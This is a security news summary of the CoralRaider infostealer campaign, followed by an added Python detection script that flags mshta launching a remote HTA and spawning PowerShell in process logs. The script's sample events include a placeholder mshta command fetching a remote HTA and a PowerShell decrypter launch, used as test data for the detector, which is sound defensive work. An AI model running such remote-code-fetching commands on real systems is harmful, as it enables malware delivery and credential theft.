
Ongoing international infostealer campaign involves CDN cache


BleepingComputer reports that systems in the U.S., Germany, Japan, and the UK have been subjected to ongoing attacks by CoralRaider, a suspected Vietnamese hacking group that is leveraging a content delivery network cache to facilitate the deployment of information-stealing payloads.

Intrusions begin with the delivery of an archive containing a malicious .LNK file which, when opened, runs an HTML Application file retrieved from a subdomain of a CDN platform in order to avert detection, according to a Cisco Talos report. The HTA file enables the execution of a PowerShell decrypter script designed to evade Windows Defender before deploying the Rhadamanthys, LummaC2, or Cryptbot infostealers.
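The chain described above (shortcut opens mshta.exe, which pulls an HTA from a CDN subdomain and then spawns PowerShell) leaves a recognisable parent/child pattern in endpoint process-creation telemetry. The following detection logic is an added example written for this summary; it is not code from the SC Media article or the Cisco Talos report. The events are constructed, Sysmon-style records, and the CDN host and script path in them are placeholders rather than real campaign indicators.

```python
"""
Added example (not from the article or the Talos report): flag the
LNK -> mshta.exe (remote HTA) -> powershell.exe chain in process-creation logs.
"""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events; fields loosely follow Sysmon Event ID 1.
# Host name and script path are placeholders, not real indicators.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "ppid": "1", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Shortcut from the archive launched mshta with a remote HTA on a CDN subdomain
    {"pid": "200", "ppid": "100", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://cdn-placeholder.example.net/x/loader.hta"},
    # mshta then spawned PowerShell to run the decrypter stage
    {"pid": "300", "ppid": "200",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\Public\decrypt.ps1"},
    # Benign: an administrator running a local HTA; must not be flagged as remote
    {"pid": "400", "ppid": "100", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\inventory.hta"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def remote_hta_launches(events: List[Dict[str, str]]) -> List[str]:
    """PIDs of mshta.exe processes whose command line carries an http(s) URL."""
    return [e["pid"] for e in events
            if basename(e["image"]) == "mshta.exe" and URL_RE.search(e["cmdline"])]


def hta_hosts(events: List[Dict[str, str]]) -> Set[str]:
    """Hosts the remote HTAs were fetched from, for analyst pivoting/blocking."""
    hosts: Set[str] = set()
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        for url in URL_RE.findall(e["cmdline"]):
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
    return hosts


def mshta_to_powershell(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(mshta_pid, powershell_pid) pairs where PowerShell is a direct child of mshta."""
    by_pid = {e["pid"]: e for e in events}
    pairs = []
    for e in events:
        if basename(e["image"]) in ("powershell.exe", "pwsh.exe"):
            parent = by_pid.get(e["ppid"])
            if parent and basename(parent["image"]) == "mshta.exe":
                pairs.append((parent["pid"], e["pid"]))
    return pairs


def score_chain(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Combine both signals: remote HTA plus a PowerShell child is high confidence."""
    remote = set(remote_hta_launches(events))
    findings = []
    for mshta_pid, ps_pid in mshta_to_powershell(events):
        findings.append({
            "mshta_pid": mshta_pid,
            "powershell_pid": ps_pid,
            "confidence": "high" if mshta_pid in remote else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in score_chain(SAMPLE_EVENTS):
        print(f)
    print("remote HTA hosts:", sorted(hta_hosts(SAMPLE_EVENTS)))
```

The local-HTA event is included deliberately: mshta.exe on its own is common enough in administrative tooling that alerting on every launch is noisy, so the rule keys on the remote URL and on the PowerShell child, and only raises the confidence to high when both are present on the same mshta process.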

Further examination revealed CoralRaider's use of newer iterations of the Rhadamanthys and LummaC2 malware, as well as an enhanced version of Cryptbot with a more comprehensive set of targets in addition to improved anti-analysis and obfuscation techniques. Attacks that are part of the campaign have been attributed to CoralRaider on the basis of tactics, techniques, and procedures observed in the group's previous attacks.
